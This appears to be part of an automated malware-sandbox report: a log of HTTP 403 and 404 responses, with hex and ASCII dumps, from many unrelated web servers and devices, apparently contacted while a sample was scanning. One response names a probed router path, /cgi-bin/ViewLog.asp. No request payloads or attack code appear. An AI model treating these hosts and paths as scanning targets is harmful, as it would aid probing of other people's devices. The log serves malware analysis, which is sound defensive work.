    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:35:13 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 14 Feb 2024 08:55:52 GMTServer: ApacheContent-Length: 228Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.<br /></p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:35:20 GMTServer: Apache/2.4.43 (Win64) mod_fcgid/2.3.10-dev OpenSSL/1.1.1fContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: WebServerDate: Wed, 14 Feb 2024 08:35:20 GMTContent-Type: text/htmlContent-Length: 110Connection: closeData Raw: 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:35:27 GMTServer: Apache/2.2.15 (Fedora)Last-Modified: Wed, 20 Mar 2013 06:54:02 GMTETag: "79f1-761-4d855afe9d680"Accept-Ranges: bytesContent-Length: 1889Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e2 96 92 e2 96 92 e2 96 92 e2 96 92 e2 96 92 20 ec b0 a8 eb 8b a8 eb 90 9c 20 ed 8e 98 ec 9d b4 ec a7 80 20 e2 96 92 e2 96 92 e2 96 92 e2 96 92 e2 96 92 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 65 66 74 6d 61 72 67 69 6e 3d 22 30 22 20 74 6f 70 6d 61 72 67 69 6e 3d 22 30 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 62 67 63 6f 6c 6f 72 3d 22 23 45 36 45 36 45 36 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 20 0a 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 34 32 32 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 61 67 65 5f 65 30 31 2e 67 69 66 22 20 77 69 64 74 68 3d 22 34 32 32 22 20 68 65 69 67 68 74 3d 22 36 30 22 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 61 67 65 5f 65 30 32 2e 67 69 66 22 20 77 69 64 74 68 3d 22 34 32 32 22 20 68 65 69 67 68 74 3d 22 33 36 22 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 62 61 63 6b 67 72 6f 75 6e 64 3d 22 2f 69 6d 61 67 65 73 2f 70 61 67 65 5f 65 62 67 2e 67 69 66 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 33 39 37 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 68 65 69 67 68 74 3d 22 35 30 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 27 66 6f 6e 74 3a 31 30 70 74 20 47 65 6f 72 67 69 61 3b 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e ec 9a 94 ec b2 ad ed 95 98 ec 8b a0 20 ed 8e 98 ec 9d b4 ec a7 80 eb 8a 94 20 eb b0 a9 ed 99 9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:35:33 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 14 Feb 2024 08:35:35 GMTserver: uvicorncontent-length: 22content-type: application/json
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:35:38 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 11:35:38 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Encoding: gzipVary: Accept-EncodingDate: Wed, 14 Feb 2024 08:35:45 GMTContent-Length: 23Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:35:47 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 6
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 6
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:35:59 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockSet-Cookie: JSESSIONID=8AED289C936463E4ADC56CEE2F9EFE27; Path=/; HttpOnlyContent-Type: text/html;charset=UTF-8Content-Length: 890Date: Wed, 14 Feb 2024 08:36:01 GMTServer: SuperSignData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 52 52 4f 52 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 68 74 6d 6c 2c 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 70 61 64 64 69 6e 67 3a 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 31 61 31 61 3b 